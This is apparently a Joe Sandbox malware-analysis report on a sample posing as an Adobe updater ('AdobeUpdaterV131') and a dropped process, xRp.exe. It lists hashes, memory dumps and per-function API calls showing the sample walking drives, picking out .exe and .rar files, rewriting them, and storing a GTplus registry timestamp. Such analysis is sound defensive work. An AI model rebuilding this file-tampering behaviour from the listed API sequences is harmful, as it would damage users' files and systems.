Associated: 00000000.00000002.4127836747.0000000000A00000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.0000000000A09000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130057771.0000000000A18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130488174.0000000000BBC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130533106.0000000000BBD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130583463.0000000000BC0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130630894.0000000000BC1000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_AdobeUpdaterV131.jbxd

Yara matches

Similarity

API ID:
String ID: unordered_map/set too long
API String ID: 0-306623848
Opcode ID: c63681f2617d5cc9a64a315e65b2fa65241d935ad4fd1bda6769ab114e0f7b4a
Instruction ID: 86d32aa0fb2c207b51d3f05399d237c835aad2cbebf109ee5dc79911998e9166
Opcode Fuzzy Hash: c63681f2617d5cc9a64a315e65b2fa65241d935ad4fd1bda6769ab114e0f7b4a
Instruction Fuzzy Hash: E9E1A271A0010A9FCF18DF68C8919ADB7FAFF49310B248369E9199B795D730ED51CB90

Function 00628080 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 318COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 0062844D

Strings

parse error, xrefs: 00628149, 00628162
ror, xrefs: 006280D4

Memory Dump Source

Source File: 00000000.00000002.4126912909.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.4126850330.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4126912909.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127757484.0000000000756000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.00000000008DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.0000000000A00000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.0000000000A09000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130057771.0000000000A18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130488174.0000000000BBC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130533106.0000000000BBD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130583463.0000000000BC0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130630894.0000000000BC1000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_AdobeUpdaterV131.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID: parse error$ror
API String ID: 2659868963-4201802366
Opcode ID: 581b46b70a7b1a5731d9c5e055c63f7026fff10654424af0fbbcbdb79b79021f
Instruction ID: 1662b77a4c64a67caaae15256545891aeb9dcdead3e366f558ccbe6b5380e774
Opcode Fuzzy Hash: 581b46b70a7b1a5731d9c5e055c63f7026fff10654424af0fbbcbdb79b79021f
Instruction Fuzzy Hash: 5DC1F571D00659CFEB08DFA8DC85BADBBB2BF55300F148258E4046B692DB74AA94CF91

Function 00627DB0 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 233COMMON

Download Yara Rule

APIs

___std_exception_destroy.LIBVCRUNTIME ref: 00628051
___std_exception_destroy.LIBVCRUNTIME ref: 00628060

Strings

[json.exception., xrefs: 00627E1C

Memory Dump Source

Source File: 00000000.00000002.4126912909.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.4126850330.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4126912909.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127757484.0000000000756000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.00000000008DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.0000000000A00000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.0000000000A09000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130057771.0000000000A18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130488174.0000000000BBC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130533106.0000000000BBD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130583463.0000000000BC0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130630894.0000000000BC1000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_AdobeUpdaterV131.jbxd

Yara matches

Similarity

API ID: ___std_exception_destroy
String ID: [json.exception.
API String ID: 4194217158-791563284
Opcode ID: 6d6bd397fb7a0350d8290fee2e4a386a81cf9ace1aa891162303bce6a345d597
Instruction ID: 4179cfed7e04723076f0a190ba024ff8999832a1fa8a0aa7a788280f8ee605d2
Opcode Fuzzy Hash: 6d6bd397fb7a0350d8290fee2e4a386a81cf9ace1aa891162303bce6a345d597
Instruction Fuzzy Hash: 069119719006189FDB18CFA8DC85BAEBBB2FF55310F14825DE400AB692D7749A84CB91

Function 00623A90 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 150COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00623C0F

Strings

ios_base::badbit set, xrefs: 00623BA7, 00623BD2, 00623BF3
ios_base::failbit set, xrefs: 00623AC8

Memory Dump Source

Source File: 00000000.00000002.4126912909.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.4126850330.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4126912909.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127757484.0000000000756000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.00000000008DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.0000000000A00000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.0000000000A09000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130057771.0000000000A18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130488174.0000000000BBC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130533106.0000000000BBD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130583463.0000000000BC0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130630894.0000000000BC1000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_AdobeUpdaterV131.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID: ios_base::badbit set$ios_base::failbit set
API String ID: 2659868963-1240500531
Opcode ID: 53df3f15ee592c4ccf6d01bb30aaf5c1ec0fa7ea1dbebab8a74e4a29b17e22a4
Instruction ID: 315489ec06993d9eb08d525b4fab4889df42f9efd1115a3d39c97a839d236ad6
Opcode Fuzzy Hash: 53df3f15ee592c4ccf6d01bb30aaf5c1ec0fa7ea1dbebab8a74e4a29b17e22a4
Instruction Fuzzy Hash: E44127B1900628ABC704DF58DC41BAEF7BAEF55310F14822EF91497781E778AA40CFA5

Function 00693850 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139COMMON

Download Yara Rule

APIs

___std_exception_destroy.LIBVCRUNTIME ref: 006940B9
___std_exception_destroy.LIBVCRUNTIME ref: 006940D2
___std_exception_destroy.LIBVCRUNTIME ref: 00694BDD
___std_exception_destroy.LIBVCRUNTIME ref: 00694BF6

Strings

value, xrefs: 00694B03

Memory Dump Source

Source File: 00000000.00000002.4126912909.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.4126850330.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4126912909.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127757484.0000000000756000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.00000000008DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.0000000000A00000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.0000000000A09000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130057771.0000000000A18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130488174.0000000000BBC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130533106.0000000000BBD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130583463.0000000000BC0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130630894.0000000000BC1000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_AdobeUpdaterV131.jbxd

Yara matches

Similarity

API ID: ___std_exception_destroy
String ID: value
API String ID: 4194217158-494360628
Opcode ID: 2e8cf18357439bc81d28b4c1953487916432a2bce39ecdd2fab9c2aa6a45c138
Instruction ID: 3312fb88e63edb09d661ab9f7e5ed4a16a28a60862273a2cde1c92e0a065a599
Opcode Fuzzy Hash: 2e8cf18357439bc81d28b4c1953487916432a2bce39ecdd2fab9c2aa6a45c138
Instruction Fuzzy Hash: 4551C2B0C0025CDFDF14DFA4DC89BDEBBBAAF05304F144259E444A7782DB746A898B55

Function 00698CC0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 130COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 00698D11

Strings

type must be boolean, but is , xrefs: 00698E02
type must be string, but is , xrefs: 00698D78

Memory Dump Source

Source File: 00000000.00000002.4126912909.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.4126850330.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4126912909.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127757484.0000000000756000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.00000000008DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.0000000000A00000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.0000000000A09000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4127836747.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130057771.0000000000A18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130488174.0000000000BBC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130533106.0000000000BBD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130583463.0000000000BC0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4130630894.0000000000BC1000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_AdobeUpdaterV131.jbxd

Yara matches

Similarity

API ID: Concurrency::cancel_current_task
String ID: type must be boolean, but is $type must be string, but is
API String ID: 118556049-436076039
Opcode ID: 724a68699e84270ee038d77b8bdf17951564d832409072194cfc06717730b5c3
Instruction ID: c1cb55265ad708edea5956b88232906d6c445fc555343ab73ba35de05b9dfedd
Opcode Fuzzy Hash: 724a68699e84270ee038d77b8bdf17951564d832409072194cfc06717730b5c3
Instruction Fuzzy Hash: E23129B1900248AFCB14EB94D842B9DB7AEEF11300F10066CF515D7B86EF79AA48C796

Analysis Process: xRp.exePID: 6568, Parent PID: 6616COMMON

Execution Graph

Execution Coverage:	28.6%
Dynamic/Decrypted Code Coverage:	10.4%
Signature Coverage:	16.5%
Total number of Nodes:	297
Total number of Limit Nodes:	10

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 004E29E2 Relevance: 31.6, APIs: 15, Strings: 3, Instructions: 128
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 004E2A02
wsprintfA.USER32 ref: 004E2A1A
memset.MSVCRT ref: 004E2A44
lstrlen.KERNEL32(?), ref: 004E2A54
lstrcpyn.KERNEL32(?,?,-00000001), ref: 004E2A6C
strrchr.MSVCRT ref: 004E2A7C
lstrcmpiA.KERNEL32(?,Documents and Settings), ref: 004E2A9F
lstrlen.KERNEL32(Documents and Settings), ref: 004E2AAE
memset.MSVCRT ref: 004E2AC6
memset.MSVCRT ref: 004E2ADA
FindFirstFileA.KERNEL32(?,?), ref: 004E2AEF
memset.MSVCRT ref: 004E2B13
lstrcmpiA.KERNEL32(?,?), ref: 004E2B42
FindNextFileA.KERNEL32(00000000,?,?,?,?), ref: 004E2B67
FindClose.KERNEL32(00000000), ref: 004E2B6E

Strings

%s*, xrefs: 004E2A14
C:\, xrefs: 004E2A2F
Documents and Settings, xrefs: 004E2A8D, 004E2A92, 004E2A9A, 004E2AAD

Memory Dump Source

Source File: 00000001.00000002.1855478330.00000000004E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000001.00000002.1855462829.00000000004E0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1855560821.00000000004E3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1855578264.00000000004E4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1855595085.00000000004E6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4e0000_xRp.jbxd

Similarity

API ID: memset$Find$Filelstrcmpilstrlen$CloseFirstNextlstrcpynstrrchrwsprintf
String ID: %s*$C:\$Documents and Settings
API String ID: 2826467728-110786608
Opcode ID: 5836115e4bfaaeccee3530a58d9871314ef71d5b21ff30e7a0b480e0f251dfe7
Instruction ID: 2dc5d9ac8227808c5b5bec70d233ea198ce2e4fad8d826b281451d1ebcf7e33b
Opcode Fuzzy Hash: 5836115e4bfaaeccee3530a58d9871314ef71d5b21ff30e7a0b480e0f251dfe7
Instruction Fuzzy Hash: B54176B2804389AFD721DF91DD89DEB77ACEB84316F04093AF544C7111E678DA4887AA

Function 004E1718 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 65
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemTimeAsFileTime.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\xRp.exe), ref: 004E1729
SHSetValueA.SHLWAPI(80000002,SOFTWARE\GTplus,Time,00000003,?,00000008), ref: 004E174C
SHGetValueA.SHLWAPI(80000002,SOFTWARE\GTplus,Time,?,?,00000001), ref: 004E177C
__aulldiv.LIBCMT ref: 004E1796
__aulldiv.LIBCMT ref: 004E17A8

Strings

Time, xrefs: 004E173D, 004E1766
C:\Users\user\AppData\Local\Temp\xRp.exe, xrefs: 004E1722
SOFTWARE\GTplus, xrefs: 004E1742, 004E176B

Memory Dump Source

Source File: 00000001.00000002.1855478330.00000000004E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000001.00000002.1855462829.00000000004E0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1855560821.00000000004E3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1855578264.00000000004E4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1855595085.00000000004E6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4e0000_xRp.jbxd

Similarity

API ID: TimeValue__aulldiv$FileSystem
String ID: C:\Users\user\AppData\Local\Temp\xRp.exe$SOFTWARE\GTplus$Time
API String ID: 541852442-3211683193
Opcode ID: 632597f045288ac55cd79848b548fcd81ad7ebdb76084ac3eac0963d5a2e8c0f
Instruction ID: 6087e574c13ecec1e6e3a211f639aa2140a24b9b54c4a678f36e89bb4cd1a677
Opcode Fuzzy Hash: 632597f045288ac55cd79848b548fcd81ad7ebdb76084ac3eac0963d5a2e8c0f
Instruction Fuzzy Hash: 7311DA71940285BBDB108F91CCC9FEFBBBCEB04B16F204056F901A7141D6789A448B68

Function 004E6076 Relevance: 11.1, APIs: 7, Instructions: 616
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,00001800,00001000,00000004), ref: 004E60BE
VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?), ref: 004E60DF
VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?), ref: 004E6189
VirtualFree.KERNELBASE(?,00000000,00008000), ref: 004E61A5

Memory Dump Source

Source File: 00000001.00000002.1855595085.00000000004E6000.00000040.00000001.01000000.00000004.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000001.00000002.1855462829.00000000004E0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1855478330.00000000004E1000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1855560821.00000000004E3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1855578264.00000000004E4000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4e0000_xRp.jbxd

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: bdd6c6c6ee817dc2397c291705eae79ab7702b2eb28f2ba843b8348c72fe178c
Instruction ID: 5978ddecb084c166188e7d1288606446a573098f7e3731ed3baee11b49d781d6
Opcode Fuzzy Hash: bdd6c6c6ee817dc2397c291705eae79ab7702b2eb28f2ba843b8348c72fe178c
Instruction Fuzzy Hash: 551266726087C49FDB328F25CC45BEA7BB0EF22351F1A059EDD858B293D238A901C759

Function 004E2B8C Relevance: 10.6, APIs: 7, Instructions: 74
threadstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 004E2BA6
GetLogicalDriveStringsA.KERNEL32(00000050,?), ref: 004E2BB4
GetDriveTypeA.KERNEL32(?), ref: 004E2BD3
CreateThread.KERNEL32(00000000,00000000,004E2B7D,?,00000000,00000000), ref: 004E2BEE
lstrlen.KERNEL32(?), ref: 004E2BFB
WaitForMultipleObjects.KERNEL32(?,?,00000001,000000FF), ref: 004E2C16
CreateThread.KERNEL32(00000000,00000000,004E2845,00000000,00000000,00000000), ref: 004E2C3A

Memory Dump Source

Source File: 00000001.00000002.1855478330.00000000004E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000001.00000002.1855462829.00000000004E0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1855560821.00000000004E3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1855578264.00000000004E4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1855595085.00000000004E6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4e0000_xRp.jbxd

Similarity

API ID: CreateDriveThread$LogicalMultipleObjectsStringsTypeWaitlstrlenmemset
String ID:
API String ID: 1073171358-0
Opcode ID: 35d3bca3129d2a449bf60c4e0edf85fe24c48313eff82110ac51d0d7b9b9a917
Instruction ID: e101d3b60bc02551b3c7dac1be8e545733d9c9e0a7c9413f00f91c45a7c25646
Opcode Fuzzy Hash: 35d3bca3129d2a449bf60c4e0edf85fe24c48313eff82110ac51d0d7b9b9a917
Instruction Fuzzy Hash: D521D5B18001CCAFE7219F659C84EAF7B6DFB44346B24012AF85293152D7A89E06CB69

Function 004E1E6E Relevance: 44.1, APIs: 20, Strings: 5, Instructions: 380
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetFileAttributesA.KERNEL32(?,00000080,?,004E32B0,00000164,004E2986,?), ref: 004E1EB9
CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000003,00000080,00000000), ref: 004E1ECD
SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000002,00000000,00000000), ref: 004E1EF3
CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00000000,00000000), ref: 004E1F07
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000400), ref: 004E1F1D
FlushViewOfFile.KERNEL32(?,00000400,?,00000000,00000000,?,00000000,00000002), ref: 004E201E
memset.MSVCRT ref: 004E20D8
memset.MSVCRT ref: 004E20EA
memcpy.MSVCRT ref: 004E222D
UnmapViewOfFile.KERNEL32(?,?,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 004E2238
CloseHandle.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 004E224A
SetFilePointer.KERNEL32(000000FF,?,00000000,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 004E22C6
SetEndOfFile.KERNEL32(000000FF,?,?,?,00000000,00000000,?,00000000,00000002), ref: 004E22CB
SetFilePointer.KERNEL32(000000FF,?,00000000,00000002,?,?,?,00000000,00000000,?,00000000,00000002), ref: 004E22DD
WriteFile.KERNEL32(000000FF,004E4008,00000271,?,00000000,?,?,?,00000000,00000000,?,00000000,00000002), ref: 004E22F7
WriteFile.KERNEL32(000000FF,?,00000000,?,?,?,00000000,00000000,?,00000000,00000002), ref: 004E230D
CloseHandle.KERNEL32(000000FF,000000FF,00000001,?,?,?,00000000,00000000,?,00000000,00000002), ref: 004E2322
UnmapViewOfFile.KERNEL32(?,?,004E32B0,00000164,004E2986,?), ref: 004E2340
FindCloseChangeNotification.KERNEL32(?,?,004E32B0,00000164,004E2986,?), ref: 004E234E
CloseHandle.KERNEL32(000000FF,?,004E32B0,00000164,004E2986,?), ref: 004E2359

Strings

5@N, xrefs: 004E2282
<@N, xrefs: 004E2290
m@N, xrefs: 004E1E8F, 004E225A
.@N, xrefs: 004E2274
C@N, xrefs: 004E229E

Memory Dump Source

Source File: 00000001.00000002.1855478330.00000000004E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000001.00000002.1855462829.00000000004E0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1855560821.00000000004E3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1855578264.00000000004E4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1855595085.00000000004E6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4e0000_xRp.jbxd

Similarity

API ID: File$CloseView$HandlePointer$CreateUnmapWritememset$AttributesChangeFindFlushMappingNotificationmemcpy
String ID: .@N$5@N$<@N$C@N$m@N
API String ID: 1893444929-2873707592
Opcode ID: 6a9a0ccfd176a00a02f13b5bfef423378e30b55923662261d186681c6daa4234
Instruction ID: 1db8fc036f567fca3ede2a4b057bb9e7e80ab02c9448cec51288cf3e6e11f445
Opcode Fuzzy Hash: 6a9a0ccfd176a00a02f13b5bfef423378e30b55923662261d186681c6daa4234
Instruction Fuzzy Hash: 87F1B471940248EFCB20DFA6DD84AADBBB5FF08315F10452EE519AB261D778AD41CF18

Function 004E28B8 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 100
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 004E28D3
wsprintfA.USER32 ref: 004E28F7
memset.MSVCRT ref: 004E2925
wsprintfA.USER32 ref: 004E2940

Part of subcall function 004E29E2: memset.MSVCRT ref: 004E2A02
Part of subcall function 004E29E2: wsprintfA.USER32 ref: 004E2A1A
Part of subcall function 004E29E2: memset.MSVCRT ref: 004E2A44
Part of subcall function 004E29E2: lstrlen.KERNEL32(?), ref: 004E2A54
Part of subcall function 004E29E2: lstrcpyn.KERNEL32(?,?,-00000001), ref: 004E2A6C
Part of subcall function 004E29E2: strrchr.MSVCRT ref: 004E2A7C
Part of subcall function 004E29E2: lstrcmpiA.KERNEL32(?,Documents and Settings), ref: 004E2A9F
Part of subcall function 004E29E2: lstrlen.KERNEL32(Documents and Settings), ref: 004E2AAE
Part of subcall function 004E29E2: memset.MSVCRT ref: 004E2AC6
Part of subcall function 004E29E2: memset.MSVCRT ref: 004E2ADA
Part of subcall function 004E29E2: FindFirstFileA.KERNEL32(?,?), ref: 004E2AEF
Part of subcall function 004E29E2: memset.MSVCRT ref: 004E2B13

strrchr.MSVCRT ref: 004E2959
lstrcmpiA.KERNEL32(00000001,exe), ref: 004E2974

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 004E29B3
%s\, xrefs: 004E293A
rar, xrefs: 004E2988
%s%s, xrefs: 004E28F1
exe, xrefs: 004E296D

Memory Dump Source

Source File: 00000001.00000002.1855478330.00000000004E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000001.00000002.1855462829.00000000004E0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1855560821.00000000004E3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1855578264.00000000004E4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1855595085.00000000004E6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4e0000_xRp.jbxd

Similarity

API ID: memset$wsprintf$lstrcmpilstrlenstrrchr$FileFindFirstlstrcpyn
String ID: %s%s$%s\$C:\Users\user\AppData\Local\Temp\$exe$rar
API String ID: 3004273771-3007274656
Opcode ID: 7fcbad6cd1e4cf29d4ea0e1dede479290ff50badd79e33ad41b8be5d49db91b0
Instruction ID: f265c80d63f2402e017df6fa9e7f93d8881ba041d6ad2a0c1094f37f32f82141
Opcode Fuzzy Hash: 7fcbad6cd1e4cf29d4ea0e1dede479290ff50badd79e33ad41b8be5d49db91b0
Instruction Fuzzy Hash: E131D7B1A4038C77DB219B67DC89FDA375C9B10316F140467F58597182D6FC9AC48B68

Function 004E1973 Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 144
filesleepmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PathFileExistsA.SHLWAPI(\NN`NN,00000000,C:\Users\user\AppData\Local\Temp\xRp.exe), ref: 004E1992
CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 004E19BA
Sleep.KERNEL32(00000064), ref: 004E19C6
wsprintfA.USER32 ref: 004E19EC
GetFileSize.KERNEL32(?,00000000), ref: 004E1A2C
VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 004E1A46
ReadFile.KERNEL32(?,?,00000000,?,00000000), ref: 004E1A65
FindCloseChangeNotification.KERNEL32(000000FF), ref: 004E1A90
VirtualFree.KERNEL32(?,00000000,00008000), ref: 004E1AC1

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 004E19DB
%s%.8X.data, xrefs: 004E19E6
C:\Users\user\AppData\Local\Temp\xRp.exe, xrefs: 004E197C
\NN`NN, xrefs: 004E1980

Memory Dump Source

